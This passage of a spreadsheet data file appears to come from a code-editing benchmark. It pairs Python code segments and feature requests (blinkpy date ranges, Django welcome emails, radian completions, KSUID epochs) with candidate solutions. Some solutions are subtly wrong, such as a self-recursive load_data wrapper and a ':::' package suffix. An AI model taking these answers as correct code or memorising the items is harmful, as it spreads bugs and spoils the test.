Args:\n        data_dir: Path to dataset directory\n        batch_size: Batch size for data loader\n        image_size: Size to resize images to\n        class_cond: Whether to use class conditioning\n        augment: Enable data augmentation\n        augment_prob: Probability of applying augmentation\n        augment_types: Comma-separated string of augmentation types\n        num_workers: Number of data loading workers\n    \n    Returns:\n        DataLoader with optional augmentation transforms\n    """\n    # #New: Build augmentation pipeline\n    augmentation_transforms = []\n    if augment:\n        augment_list = [t.strip() for t in augment_types.split(",")]\n        if "flip" in augment_list:\n            augmentation_transforms.append(transforms.RandomHorizontalFlip(p=augment_prob))\n        if "rotate" in augment_list:\n            augmentation_transforms.append(transforms.RandomRotation(degrees=15))\n        if "brightness" in augment_list:\n            augmentation_transforms.append(transforms.ColorJitter(brightness=0.2))\n        if "contrast" in augment_list:\n            augmentation_transforms.append(transforms.ColorJitter(contrast=0.2))\n        if "saturation" in augment_list:\n            augmentation_transforms.append(transforms.ColorJitter(saturation=0.2))\n    \n    # #New: Combine augmentation with standard transforms\n    transform_list = augmentation_transforms + [\n        transforms.Resize(image_size),\n        transforms.CenterCrop(image_size),\n        transforms.ToTensor(),\n        transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n    ]\n    \n    transform = transforms.Compose(transform_list)\n    \n    # #New: Load dataset with transforms (placeholder implementation)\n    # This should be replaced with actual dataset loading logic\n    from torch.utils.data import DataLoader, TensorDataset\n    \n    # Placeholder: create dummy dataset\n    dummy_data = torch.randn(100, 3, image_size, image_size)\n    dummy_labels = torch.randint(0, 10, (100,)) if class_cond else None\n    \n    dataset = TensorDataset(dummy_data, dummy_labels) if class_cond else TensorDataset(dummy_data)\n    \n    return DataLoader(\n        dataset,\n        batch_size=batch_size,\n        shuffle=True,\n        num_workers=num_workers,\n    )'}</t>
  </si>
  <si>
    <t>{'#file 1': "def load_data(data_dir, batch_size, image_size, class_cond, augment=False):\n    #Modify: Added 'augment' parameter\n    data = load_data(\n        data_dir=data_dir,\n        batch_size=batch_size,\n        image_size=image_size,\n        class_cond=class_cond,\n        augment=augment,\n    )\n    return data", '#file 2': 'logger.log("creating data loader...")\n#Modify: Added \'augment\' parameter\ndata = load_data(\n    data_dir=args.data_dir,\n    batch_size=args.batch_size,\n    image_size=args.image_size,\n    class_cond=args.class_cond,\n    augment=args.augment,\n)\n\n#New: Add \'augment\' argument to argparser\ndef create_argparser():\n    defaults = dict(\n        data_dir="",\n        schedule_sampler="uniform",\n        lr=1e-4,\n        weight_decay=0.0,\n        lr_anneal_steps=0,\n        batch_size=1,\n        microbatch=-1,  # -1 disables microbatches\n        ema_rate="0.9999",  # comma-separated list of EMA values\n        log_interval=10,\n        save_interval=10000,\n        resume_checkpoint="",\n        use_fp16=False,\n        fp16_scale_growth=1e-3,\n        augment=False,  # New: default value for augmentation\n    )\n    defaults.update(model_and_diffusion_defaults())\n    parser = argparse.ArgumentParser()\n    add_dict_to_argparser(parser, defaults)\n    return parser'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'async def json_load(file_name):\n    """Load json credentials from file."""\n    try:\n        async with aiofiles.open(file_name, "r") as json_file:\n            test = await json_file.read()\n            data = json.loads(test)\n        return data\n    except FileNotFoundError:\n        _LOGGER.error("Could not find %s", file_name)\n    except json.decoder.JSONDecodeError:\n        _LOGGER.error("File %s has improperly formatted json", file_name)\n    return None', 'invoking_code_segment': 'async def start(session: ClientSession):\n    """Startup blink app."""\n    blink = Blink(session=session)\n    blink.auth = Auth(await json_load(CREDFILE), session=session)\n    await blink.start()\n    return blink\n\n\nasync def main():\n    """Run the blink app."""\n    session = ClientSession()\n    blink = await start(session)\n    await download_videos(blink)\n    await blink.save(CREDFILE)\n    await session.close()', 'feature_description': 'Add a feature to allow the user to specify a custom date range for video downloads by accepting start_date and end_date parameters in the download_videos function and passing them through the application flow.', 'modified_complete_code': '#file 1: blinkpy/helpers/util.py\n#New function added at the end of the file\nasync def parse_date_range(start_date=None, end_date=None):\n    """Parse and validate custom date range for video downloads."""\n    if start_date is None and end_date is None:\n        return None, None\n    \n    try:\n        if start_date:\n            start_dt = dateutil.parser.isoparse(start_date)\n        else:\n            start_dt = None\n        \n        if end_date:\n            end_dt = dateutil.parser.isoparse(end_date)\n        else:\n            end_dt = None\n        \n        if start_dt and end_dt and start_dt &gt; end_dt:\n            _LOGGER.error("Start date cannot be after end date")\n            return None, None\n        \n        return start_dt.isoformat() if start_dt else None, end_dt.isoformat() if end_dt else None\n    except ValueError:\n        _LOGGER.error("Invalid date format provided")\n        return None, None\n\n\n#file 2: blinkpy/blinkapp/blinkapp.py\n#Modify imports\nfrom os import environ\nimport asyncio\nfrom datetime import datetime, timedelta\nfrom aiohttp import ClientSession\nfrom blinkpy.blinkpy import Blink\nfrom blinkpy.auth import Auth\nfrom blinkpy.helpers.util import json_load, parse_date_range  #Modify: added parse_date_range\n\nCREDFILE = environ.get("CREDFILE")\nTIMEDELTA = timedelta(environ.get("TIMEDELTA", 1))\n#New: environment variables for custom date range\nSTART_DATE = environ.get("START_DATE", None)\nEND_DATE = environ.get("END_DATE", None)\n\n\ndef get_date():\n    """Return now - timedelta for blinkpy."""\n    return (datetime.now() - TIMEDELTA).isoformat()\n\n\n#Modify: updated function signature to accept custom date range\nasync def download_videos(blink, save_dir="/media", start_date=None, end_date=None):\n    """Make request to download videos."""\n    if start_date or end_date:\n        since = start_date\n    else:\n        since = get_date()\n    await blink.download_videos(save_dir, since=since)\n\n\nasync def start(session: ClientSession):\n    """Startup blink app."""\n    blink = Blink(session=session)\n    blink.auth = Auth(await json_load(CREDFILE), session=session)\n    await blink.start()\n    return blink\n\n\n#Modify: updated main function to handle custom date range\nasync def main():\n    """Run the blink app."""\n    session = ClientSession()\n    blink = await start(session)\n    #New: parse custom date range from environment variables\n    start_date, end_date = await parse_date_range(START_DATE, END_DATE)\n    await download_videos(blink, start_date=start_date, end_date=end_date)\n    await blink.save(CREDFILE)\n    await session.close()\n\n\nif __name__ == "__main__":\n    loop = asyncio.get_event_loop()\n    loop.run_until_complete(main())'}</t>
  </si>
  <si>
    <t>{'file1': 'async def download_videos(blink, save_dir="/media", start_date=None, end_date=None):\n    """Make request to download videos."""\n    #Modify: Added start_date and end_date parameters\n    await blink.download_videos(save_dir, start_date=start_date, end_date=end_date)', 'file2': 'from os import environ\nimport asyncio\nfrom datetime import datetime, timedelta\nfrom aiohttp import ClientSession\nfrom blinkpy.blinkpy import Blink\nfrom blinkpy.auth import Auth\nfrom blinkpy.helpers.util import json_load\n\nCREDFILE = environ.get("CREDFILE")\nTIMEDELTA = timedelta(environ.get("TIMEDELTA", 1))\nSTART_DATE = environ.get("START_DATE")\nEND_DATE = environ.get("END_DATE")\n\ndef get_date(date_str):\n    """Return datetime object from ISO formatted string."""\n    return datetime.fromisoformat(date_str)\n\nasync def download_videos(blink, save_dir="/media", start_date=None, end_date=None):\n    """Make request to download videos."""\n    await blink.download_videos(save_dir, start_date=start_date, end_date=end_date)\n\nasync def start(session: ClientSession):\n    """Startup blink app."""\n    blink = Blink(session=session)\n    blink.auth = Auth(await json_load(CREDFILE), session=session)\n    await blink.start()\n    return blink\n\nasync def main():\n    """Run the blink app."""\n    session = ClientSession()\n    blink = await start(session)\n    start_date = get_date(START_DATE) if START_DATE else None\n    end_date = get_date(END_DATE) if END_DATE else None\n    await download_videos(blink, start_date=start_date, end_date=end_date)\n    await blink.save(CREDFILE)\n    await session.close()'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'user_did_save function and post_save.connect(user_did_save, sender=User) in profiles/models.py', 'invoking_code_segment': 'admin.site.register(Profile) in profiles/admin.py', 'feature_description': 'Add a feature to automatically send a welcome email to the user when their profile is created', 'modified_complete_code': '# profiles/models.py\nfrom django.conf import settings\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.core.mail import send_mail\nfrom django.template.loader import render_to_string\n\nUser = settings.AUTH_USER_MODEL\n\nclass FollowerRelation(models.Model):\n    user = models.ForeignKey(User, on_delete=models.CASCADE)\n    profile = models.ForeignKey("Profile", on_delete=models.CASCADE)\n    timestamp = models.DateTimeField(auto_now_add=True)\n\nclass Profile(models.Model):\n    user = models.OneToOneField(User, on_delete=models.CASCADE)\n    location = models.CharField(max_length=220, null=True, blank=True)\n    bio = models.TextField(blank=True, null=True)\n    timestamp = models.DateTimeField(auto_now_add=True)\n    updated = models.DateTimeField(auto_now=True)\n    followers = models.ManyToManyField(User, related_name=\'following\', blank=True)\n    """\n    project_obj = Profile.objects.first()\n    project_obj.followers.all() -&gt; All users following this profile\n    user.following.all() -&gt; All user profiles I follow\n    """\n\n# Modify: Enhanced user_did_save function to send welcome email\ndef user_did_save(sender, instance, created, *args, **kwargs):\n    if created:\n        Profile.objects.get_or_create(user=instance)\n        # New: Send welcome email to newly created user\n        send_welcome_email(instance)\n\n# New: Function to send welcome email\ndef send_welcome_email(user):\n    try:\n        subject = \'Welcome to Tweetme!\'\n        message = f\'Hello {user.username},\\n\\nWelcome to Tweetme! Your profile has been created successfully.\\n\\nStart tweeting now!\'\n        from_email = settings.DEFAULT_FROM_EMAIL\n        recipient_list = [user.email]\n        send_mail(subject, message, from_email, recipient_list, fail_silently=True)\n    except Exception as e:\n        print(f\'Error sending welcome email: {str(e)}\')\n\npost_save.connect(user_did_save, sender=User)\n\n# profiles/admin.py\nfrom django.contrib import admin\nfrom .models import Profile\n\n# Modify: Register Profile with custom admin configuration\nclass ProfileAdmin(admin.ModelAdmin):\n    list_display = [\'user\', \'location\', \'timestamp\']\n    search_fields = [\'user__username\', \'location\']\n    readonly_fields = [\'timestamp\', \'updated\']\n\nadmin.site.register(Profile, ProfileAdmin)'}</t>
  </si>
  <si>
    <t>{'profiles/models.py': '#Modify\ndef user_did_save(sender, instance, created, *args, **kwargs):\n    if created:\n        Profile.objects.get_or_create(user=instance)\n        #New\n        send_welcome_email(instance)', 'profiles/admin.py': "from django.contrib import admin\n\nfrom .models import Profile\n\nadmin.site.register(Profile)\n\n#New\ndef send_welcome_email(user):\n    from django.core.mail import send_mail\n    subject = 'Welcome to Tweetme-2!'\n    message = 'Thank you for joining Tweetme-2!'\n    from_email = 'admin@example.com'\n    recipient_list = [user.email]\n    send_mail(subject, message, from_email, recipient_list, fail_silently=False)"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def cursor_in_string(document):\n    tokens = list(lexer.get_tokens(document.text_before_cursor.rstrip()))\n    if not tokens:\n        return False\n    for t, s in reversed(tokens):\n        if t is Token.Text and s == "\\n":\n            continue\n        elif t is Token.Error:\n            return True\n        elif t is Token.Literal.String:\n            return True\n        else:\n            return False\n    return False', 'invoking_code_segment': 'def get_package_completions(self, document, complete_event):\n    text_before = document.current_line_before_cursor\n    token_match = TOKEN_PATTERN.match(text_before)\n    if not token_match:\n        return\n    token = token_match.group(1)\n    library_prefix = LIBRARY_PATTERN.match(text_before)\n    instring = cursor_in_string(document)\n    for p in installed_packages():\n        if p.startswith(token):\n            comp = p if instring or library_prefix else p + "::"', 'feature_description': 'Add a feature to handle completions within multi-line strings by enhancing the cursor_in_string function to track string state across multiple lines and modifying the completion logic to properly handle multi-line string contexts.', 'modified_complete_code': '# radian/radian/document.py\nfrom pygments.token import Token\nfrom radian.lexer import CustomSLexer\n\nlexer = CustomSLexer()\n\n\ndef cursor_in_string(document):\n    # #Modify: Enhanced to handle multi-line strings\n    # Get all text up to cursor, not just current line\n    full_text = document.text_before_cursor\n    tokens = list(lexer.get_tokens(full_text))\n    if not tokens:\n        return False\n    \n    # #New: Track string state across multiple lines\n    string_stack = []\n    for t, s in tokens:\n        if t is Token.Literal.String:\n            # Track opening and closing of strings\n            if s.startswith((\'"\', "\'", \'"""\', "\'\'\'")):\n                string_stack.append(t)\n            elif string_stack and string_stack[-1] is Token.Literal.String:\n                string_stack.pop()\n        elif t is Token.Error:\n            return True\n    \n    # #Modify: Return True if we\'re inside a string context\n    if string_stack:\n        return True\n    \n    # #New: Check last meaningful token for string context\n    for t, s in reversed(tokens):\n        if t is Token.Text and s == "\\n":\n            continue\n        elif t is Token.Error:\n            return True\n        elif t is Token.Literal.String:\n            return True\n        else:\n            return False\n    return False\n\n\n# #New: Additional helper function for multi-line string detection\ndef is_in_multiline_string(document):\n    """Check if cursor is within a multi-line string (triple quotes)."""\n    text = document.text_before_cursor\n    triple_double = text.count(\'"""\')\n    triple_single = text.count("\'\'\'")\n    return (triple_double % 2 == 1) or (triple_single % 2 == 1)\n\n\n# radian/radian/completion.py\nfrom prompt_toolkit.completion import Completer, Completion\nimport os\nimport sys\nimport shlex\nimport re\n\nfrom rchitect import completion as rcompletion\n\nfrom .settings import radian_settings as settings\nfrom .latex import get_latex_completions\nfrom .rutils import installed_packages\nfrom .console import suppress_stderr\nfrom .document import cursor_in_string, is_in_multiline_string  # #Modify: Import new helper\n\n\nTOKEN_PATTERN = re.compile(r".*?([a-zA-Z0-9._]+)$")\nLIBRARY_PATTERN = re.compile(\n    r"(?:(?:library|require)\\([\\"\']?|requireNamespace\\([\\"\'])([a-zA-Z0-9._]*)$")\n\n\ndef remove_nested_paren(text):\n    new_text = re.sub(r"\\([^())]*\\)", "", text)\n    while new_text != text:\n        text = new_text\n        new_text = re.sub(r"\\([^())]*\\)", "", text)\n    return new_text\n\n\nclass RCompleter(Completer):\n    def __init__(self, timeout=0.02):\n        self.timeout = timeout\n        super(RCompleter, self).__init__()\n\n    def get_completions(self, document, complete_event):\n        word = document.get_word_before_cursor()\n        prefix_length = settings.completion_prefix_length\n        if len(word) &lt; prefix_length and not complete_event.completion_requested:\n            return\n\n        latex_comps = list(get_latex_completions(document, complete_event))\n        # only return latex completions if prefix has \\\n        if len(latex_comps) &gt; 0:\n            for x in latex_comps:\n                yield x\n            return\n\n        for x in self.get_r_builtin_completions(document, complete_event):\n            yield x\n        for x in self.get_package_completions(document, complete_event):\n            yield x\n\n    def get_r_builtin_completions(self, document, complete_event):\n        text_before = document.current_line_before_cursor\n        completion_requested = complete_event.completion_requested\n\n        library_prefix = LIBRARY_PATTERN.match(text_before)\n        if library_prefix:\n            return\n\n        # #Modify: Skip completion in multi-line strings\n        if is_in_multiline_string(document):\n            return\n\n        # somehow completion while typing is very slow in "print("\n        # so we manually disable it\n        if not completion_requested and "print(" in text_before and \\\n                re.match(r".*print\\([^\\)]*$", remove_nested_paren(text_before)):\n            token = rcompletion.assign_line_buffer(text_before)\n            text_before = token\n\n        with suppress_stderr():\n            try:\n                token = rcompletion.assign_line_buffer(text_before)\n                # do not timeout package::func\n                if "::" in token or completion_requested:\n                    timeout = 0\n                else:\n                    timeout = self.timeout\n                rcompletion.complete_token(timeout)\n                completions = rcompletion.retrieve_completions()\n            except Exception:\n                completions = []\n\n        for c in completions:\n            if c.startswith(token) and c != token:\n                if c.endswith("=") and settings.completion_adding_spaces_around_equals:\n                    c = c[:-1] + " = "\n                if c.endswith("::"):\n                    # let get_package_completions handles it\n                    continue\n                yield Completion(c, -len(token))\n\n    def get_package_completions(self, document, complete_event):\n        text_before = document.current_line_before_cursor\n        token_match = TOKEN_PATTERN.match(text_before)\n        if not token_match:\n            return\n        token = token_match.group(1)\n        library_prefix = LIBRARY_PATTERN.match(text_before)\n        # #Modify: Enhanced to check both single-line and multi-line string contexts\n        instring = cursor_in_string(document) or is_in_multiline_string(document)\n        for p in installed_packages():\n            if p.startswith(token):\n                comp = p if instring or library_prefix else p + ":::"\n                yield Completion(comp, -len(token))\n\n\nclass SmartPathCompleter(Completer):\n    def get_completions(self, document, complete_event):\n        text = document.text_before_cursor\n        if len(text) == 0:\n            return\n\n        # #Modify: Skip path completion in multi-line strings\n        if is_in_multiline_string(document):\n            return\n\n        # do not auto complete when typing\n        if not complete_event.completion_requested:\n            return\n\n        if sys.platform.startswith(\'win\'):\n            text = text.replace("\\\\", "/")\n\n        directories_only = False\n        quoted = False\n\n        if text.lstrip().startswith("cd "):\n            directories_only = True\n            text = text.lstrip()[3:]\n\n        try:\n            path = ""\n            while not path and text:\n                quoted = False\n                try:\n                    if text.startswith(\'"\'):\n                        path = shlex.split(text + "\\"")\n                        quoted = True\n                    elif text.startswith("\'"):\n                        path = shlex.split(text + "\'")\n                        quoted = True\n                    else:\n                        path = shlex.split(text)\n                except RuntimeError:\n                    pass\n                finally:\n                    if not path:\n                        text = text[1:]\n\n            path = os.path.expanduser(path)\n            path = os.path.expandvars(path)\n            if not os.path.isabs(path):\n                path = os.path.join(os.getcwd(), path)\n            basename = os.path.basename(path)\n            dirname = os.path.dirname(path)\n\n            for c in os.listdir(dirname):\n                if directories_only and not os.path.isdir(os.path.join(dirname, c)):\n                    continue\n                if c.lower().startswith(basename.lower()):\n                    if sys.platform.startswith(\'win\') or quoted:\n                        yield Completion(str(c), -len(basename))\n                    else:\n                        yield Completion(str(c.replace(" ", "\\\\ ")), -len(basename))\n\n        except Exception:\n            pass'}</t>
  </si>
  <si>
    <t>{'radian/radian/document.py': '#Modify\ndef cursor_in_string(document):\n    tokens = list(lexer.get_tokens(document.text_before_cursor.rstrip()))\n    if not tokens:\n        return False\n    in_multi_line_string = False\n    for t, s in reversed(tokens):\n        if t is Token.Text and s == "\\n":\n            continue\n        elif t is Token.Error:\n            return True\n        elif t is Token.Literal.String:\n            if s.startswith(\'"""\') or s.startswith("\'\'\'"):\n                in_multi_line_string = True\n            return True\n        else:\n            if in_multi_line_string:\n                return True\n            return False\n    return False', 'radian/radian/completion.py': '#Modify\ndef get_package_completions(self, document, complete_event):\n    text_before = document.current_line_before_cursor\n    token_match = TOKEN_PATTERN.match(text_before)\n    if not token_match:\n        return\n    token = token_match.group(1)\n    library_prefix = LIBRARY_PATTERN.match(text_before)\n    instring = cursor_in_string(document)\n    for p in installed_packages():\n        if p.startswith(token):\n            comp = p if instring or library_prefix else p + "::"\n            yield Completion(comp, -len(token))\n\n#New\ndef get_multi_line_string_completions(self, document, complete_event):\n    if not cursor_in_string(document):\n        return\n    text_before = document.current_line_before_cursor\n    token_match = TOKEN_PATTERN.match(text_before)\n    if not token_match:\n        return\n    token = token_match.group(1)\n    for p in installed_packages():\n        if p.startswith(token):\n            yield Completion(p, -len(token))'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class ksuid():\n    def __init__(self, timestamp=None):\n        payload = os.urandom(BODY_LENGTH)\n        if timestamp is None:\n            currTime = int(time.time())\n        else:\n            currTime = timestamp\n        byteEncoding = int_to_bytes(int(currTime - EPOCH_TIME), 4, "big")\n        self.__uid = list(byteEncoding) + list(payload)', 'invoking_code_segment': 'uid = ksuid()\nuid1 = ksuid()\nuid2 = ksuid()\nu1 = ksuid()\nu2 = ksuid()\nlist.append(ksuid())', 'feature_description': 'Add a feature to allow the user to specify a custom epoch time for the KSUID generation. This enables flexibility in choosing different epoch times instead of being limited to the hardcoded EPOCH_TIME constant.', 'modified_complete_code': '#file 1: KSUID/ksuid/ksuid.py\nimport datetime\nimport os\nimport sys\nimport time\n\nfrom .base62 import decodebytes, encodebytes\nfrom .utils import int_from_bytes, int_to_bytes\n\n# Used instead of zero(January 1, 1970), so that the lifespan of KSUIDs\n# will be considerably longer\nEPOCH_TIME = 1400000000\n\nTIME_STAMP_LENGTH = 4  # number  bytes storing the timestamp\nBODY_LENGTH = 16  # Number of bytes consisting of the UUID\n\n#New: Class variable to store custom epoch time\n_custom_epoch = None\n\nclass ksuid():\n    """ The primary classes that encompasses ksuid functionality.\n    When given optional timestamp argument, the ksuid will be generated\n    with the given timestamp. Else the current time is used.\n    """\n\n    #Modify: Added custom_epoch parameter\n    def __init__(self, timestamp=None, custom_epoch=None):\n        payload = os.urandom(BODY_LENGTH)  # generates the payload\n        if timestamp is None:\n            currTime = int(time.time())\n        else:\n            currTime = timestamp\n        #Modify: Use custom_epoch if provided, otherwise use EPOCH_TIME\n        epoch = custom_epoch if custom_epoch is not None else EPOCH_TIME\n        # Note, this code may throw an overflow exception, far into the future\n        byteEncoding = int_to_bytes(int(currTime - epoch), 4,  "big")\n\n        self.__uid = list(byteEncoding) + list(payload)\n        #New: Store the epoch used for this instance\n        self.__epoch = epoch\n\n    def getDatetime(self):\n        """ getDatetime() returns a python date object which represents the approximate time\n        that the ksuid was created """\n\n        unixTime = self.getTimestamp()\n        return datetime.datetime.fromtimestamp(unixTime)\n\n    def getTimestamp(self):\n        """ Returns the value of the timestamp, as a unix timestamp"""\n\n        unixTime = int_from_bytes(\n            self.__uid[:TIME_STAMP_LENGTH], byteorder="big")\n        #Modify: Use instance epoch instead of global EPOCH_TIME\n        return unixTime + self.__epoch\n\n    # Returns the payload without the unix timestamp\n    def getPayload(self):\n        """ Returns the value of the payload, with the timestamp encoded portion removed\n        Returns:\n             list : An array of integers, that represent the bytes used to encode the UID """\n\n        return self.__uid[TIME_STAMP_LENGTH:]\n\n    def bytes(self):\n        """ Returns the UID as raw bytes """\n\n        if sys.version_info[0] &gt;= 3:\n            return bytes(self.__uid)\n\n        return bytes("".join(self.__uid))\n\n    def toBytes(self):\n        return self.bytes()\n\n    @staticmethod\n    def fromBytes(value, custom_epoch=None):\n        """initializes KSUID from bytes"""\n        if len(value) != TIME_STAMP_LENGTH + BODY_LENGTH:\n            raise Exception("Wrong bytearray length")\n\n        res = ksuid(custom_epoch=custom_epoch)\n        res.__uid = value\n        return res\n\n    def toBase62(self):\n        """ encodes KSUID with Base62 encoding """\n        return encodebytes(self.bytes())\n\n    @staticmethod\n    def fromBase62(data, custom_epoch=None):\n        """ decodes KSUID from base62 encoding """\n        v = decodebytes(data)\n        return ksuid.fromBytes(v, custom_epoch=custom_epoch)\n\n    def __str__(self):\n        """ Creates a string representation of the Ksuid from the  bytelist """\n        if sys.version_info[0] &gt;= 3:\n            return "".join(list(map(lambda x: format(x, "02x"), self.__uid)))\n\n        return "".join(x.encode("hex") for x in self.__uid)\n\n    #New: Method to set custom epoch globally\n    @staticmethod\n    def set_custom_epoch(epoch):\n        """Set a custom epoch time for all future KSUID instances"""\n        global _custom_epoch\n        _custom_epoch = epoch\n\n    #New: Method to get current custom epoch\n    @staticmethod\n    def get_custom_epoch():\n        """Get the currently set custom epoch time"""\n        return _custom_epoch\n\n    #New: Method to reset to default epoch\n    @staticmethod\n    def reset_epoch():\n        """Reset to default EPOCH_TIME"""\n        global _custom_epoch\n        _custom_epoch = None\n\n\n#file 2: KSUID/tests/test_ksuid_serialization_support.py\nimport string\nimport time\n\nfrom ksuid import ksuid\n\n\ndef test_converts_to_base62_and_returns_value_with_numbers_and_letters():\n    valid_symbols = string.digits + string.ascii_letters\n\n    uid = ksuid()\n    value = uid.toBase62()\n\n    assert value is not None\n    assert len(value) &gt; 0\n\n    for v in value:\n        assert v in valid_symbols\n\n\ndef test_successfully_converts_to_base62_and_vice_versa():\n    uid1 = ksuid()\n    serialized = uid1.toBase62()\n\n    uid2 = ksuid.fromBase62(serialized)\n\n    assert str(uid1) == str(uid2)\n    assert uid1.bytes() == uid2.bytes()\n    assert uid1.toBytes() == uid2.toBytes()\n    assert uid1.toBase62() == uid2.toBase62()\n\n\ndef test_successfully_converts_to_bytes_and_vice_versa():\n    uid1 = ksuid()\n    serialized = uid1.toBytes()\n\n    uid2 = ksuid.fromBytes(serialized)\n\n    assert str(uid1) == str(uid2)\n    assert uid1.bytes() == uid2.bytes()\n    assert uid1.toBytes() == uid2.toBytes()\n    assert uid1.toBase62() == uid2.toBase62()\n\n\ndef test_base62_orderable():\n    list = []\n    for _ in range(1000):\n        list.append(ksuid())\n\n    sorted_list = sorted(list, key=lambda x: x.toBase62(), reverse=True)\n\n    for index in range(len(list) - 1):\n        assert sorted_list[index].getTimestamp() &gt;= sorted_list[index + 1].getTimestamp()\n\n\ndef test_measure_1s_and_compare_ksuids():\n    DELAY_INTERVAL_SECS = 1\n\n    u1 = ksuid()\n    time.sleep(DELAY_INTERVAL_SECS)\n    u2 = ksuid()\n\n    assert u1.toBase62() &lt; u2.toBase62()\n\n    assert u2.getTimestamp() &gt; u1.getTimestamp()\n    assert (u2.getTimestamp() - u1.getTimestamp()) &gt;= 1\n\n    d2 = u2.getDatetime()\n    d1 = u1.getDatetime()\n    assert d2 &gt; d1\n    assert (d2 - d1).total_seconds() &gt;= 1\n\n    assert u1.getPayload() != u2.getPayload()\n\n\ndef test_integration_test():\n    uid1 = ksuid()\n    bu = uid1.toBytes()\n\n    assert bu is not None\n\n    uid2 = ksuid.fromBytes(bu)\n\n    assert str(uid1) == str(uid2)\n    assert uid1.bytes() == uid2.bytes()\n    assert uid1.toBytes() == uid2.toBytes()\n    assert uid1.toBase62() == uid2.toBase62()\n\n    b62 = uid1.toBase62()\n    uid3 = ksuid.fromBase62(b62)\n\n    assert str(uid1) == str(uid3)\n    assert uid1.bytes() == uid2.bytes()\n    assert uid1.toBytes() == uid3.toBytes()\n    assert uid1.toBase62() == uid3.toBase62()\n\n    bs = uid1.bytes()\n    assert bs is not None\n\n\ndef test_bulk_test_for_base62_with_delays():\n    list = []\n    for _ in range(100):\n        list.append(ksuid())\n        time.sleep(0.01)\n\n    sorted_list = sorted(list, key=lambda x: x.toBase62(), reverse=True)\n\n    for index in range(len(list) - 1):\n        assert sorted_list[index].getTimestamp() &gt;= sorted_list[index + 1].getTimestamp()\n\n\n#New: Test for custom epoch feature\ndef test_custom_epoch_in_constructor():\n    custom_epoch = 1500000000\n    uid = ksuid(custom_epoch=custom_epoch)\n    assert uid.getTimestamp() &gt;= custom_epoch\n\n\n#New: Test for custom epoch with serialization\ndef test_custom_epoch_with_serialization():\n    custom_epoch = 1500000000\n    uid1 = ksuid(custom_epoch=custom_epoch)\n    serialized = uid1.toBase62()\n    uid2 = ksuid.fromBase62(serialized, custom_epoch=custom_epoch)\n    assert str(uid1) == str(uid2)'}</t>
  </si>
  <si>
    <t>{'ksuid.py': '#Modify\nclass ksuid():\n    def __init__(self, timestamp=None, epoch_time=EPOCH_TIME):\n        payload = os.urandom(BODY_LENGTH)  # generates the payload\n        if timestamp is None:\n            currTime = int(time.time())\n        else:\n            currTime = timestamp\n        # Note, this code may throw an overflow exception, far into the future\n        byteEncoding = int_to_bytes(int(currTime - epoch_time), 4,  "big")\n\n        self.__uid = list(byteEncoding) + list(payload)\n\n    def getDatetime(self):\n        """ getDatetime() returns a python date object which represents the approximate time\n        that the ksuid was created """\n\n        unixTime = self.getTimestamp()\n        return datetime.datetime.fromtimestamp(unixTime)\n\n    def getTimestamp(self):\n        """ Returns the value of the timestamp, as a unix timestamp"""\n\n        unixTime = int_from_bytes(self.__uid[:TIME_STAMP_LENGTH], byteorder="big")\n        return unixTime + EPOCH_TIME\n\n    # Returns the payload without the unix timestamp\n    def getPayload(self):\n        """ Returns the value of the payload, with the timestamp encoded portion removed\n        Returns:\n             list : An array of integers, that represent the bytes used to encode the UID """\n\n        return self.__uid[TIME_STAMP_LENGTH:]\n\n    def bytes(self):\n        """ Returns the UID as raw bytes """\n\n        if sys.version_info[0] &gt;= 3:\n            return bytes(self.__uid)\n\n        return bytes("\\x00".join(self.__uid))\n\n    def toBytes(self):\n        return self.bytes()\n\n    @staticmethod\n    def fromBytes(value):\n        """initializes KSUID from bytes"""\n        if len(value) != TIME_STAMP_LENGTH + BODY_LENGTH:\n            raise Exception("Wrong bytearray length")\n\n        res = ksuid()\n        res.__uid = value\n        return res\n\n    def toBase62(self):\n        """ encodes KSUID with Base62 encoding """\n        return encodebytes(self.bytes())\n\n    @staticmethod\n    def fromBase62(data):\n        """ decodes KSUID from base62 encoding """\n        v = decodebytes(data)\n        return ksuid.fromBytes(v)\n\n    def __str__(self):\n        """ Creates a string representation of the Ksuid from the  bytelist """\n        if sys.version_info[0] &gt;= 3:\n            return "".join(list(map(lambda x: format(x, "02x"), self.__uid)))\n\n        return "".join(x.encode("hex") for x in self.__uid)', 'test_ksuid_serialization_support.py': '#Modify\ndef test_successfully_converts_to_base62_and_vice_versa():\n    uid1 = ksuid(epoch_time=1400000000)\n    serialized = uid1.toBase62()\n\n    uid2 = ksuid.fromBase62(serialized)\n\n    assert str(uid1) == str(uid2)\n    assert uid1.bytes() == uid2.bytes()\n    assert uid1.toBytes() == uid2.toBytes()\n    assert uid1.toBase62() == uid2.toBase62()'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def mc_dropout_bald(classifier, X, n_instances=1, dropout_layer_indexes=None, num_cycles=10)', 'invoking_code_segment': 'query_idx, metric_values = learner.query(X_pool, n_instances=100, dropout_layer_indexes=[7, 11], num_cycles=10)', 'feature_description': 'Add a feature to allow the mc_dropout_bald query strategy to return uncertainty scores for queried instances, enabling users to access detailed uncertainty metrics alongside query indices for better interpretability of the active learning process.', 'modified_complete_code': '# File 1: modAL/modAL/dropout.py\nimport numpy as np\nfrom modAL.uncertainty import entropy\n\ndef mc_dropout_bald(classifier, X, n_instances=1, dropout_layer_indexes=None, num_cycles=10, return_uncertainty_scores=False):\n    """\n    MC-Dropout BALD (Bayesian Active Learning by Disagreement) query strategy.\n    \n    Parameters:\n    -----------\n    classifier : skorch NeuralNetClassifier\n        The neural network classifier with dropout layers.\n    X : array-like, shape (n_samples, ...)\n        The pool of unlabeled instances.\n    n_instances : int, default=1\n        Number of instances to query.\n    dropout_layer_indexes : list of int, optional\n        Indexes of dropout layers to activate. If None, all dropout layers are activated.\n    num_cycles : int, default=10\n        Number of forward passes with dropout enabled.\n    return_uncertainty_scores : bool, default=False\n        #New If True, return uncertainty scores for all instances in addition to query indices.\n    \n    Returns:\n    --------\n    query_idx : array-like\n        Indices of the queried instances.\n    metric_values : array-like\n        #Modify BALD scores for all instances. If return_uncertainty_scores is True, returns dict with \'bald_scores\' and \'uncertainty_scores\'.\n    """\n    # Activate specified dropout layers\n    if dropout_layer_indexes is not None:\n        for idx, module in enumerate(classifier.module_.modules()):\n            if isinstance(module, 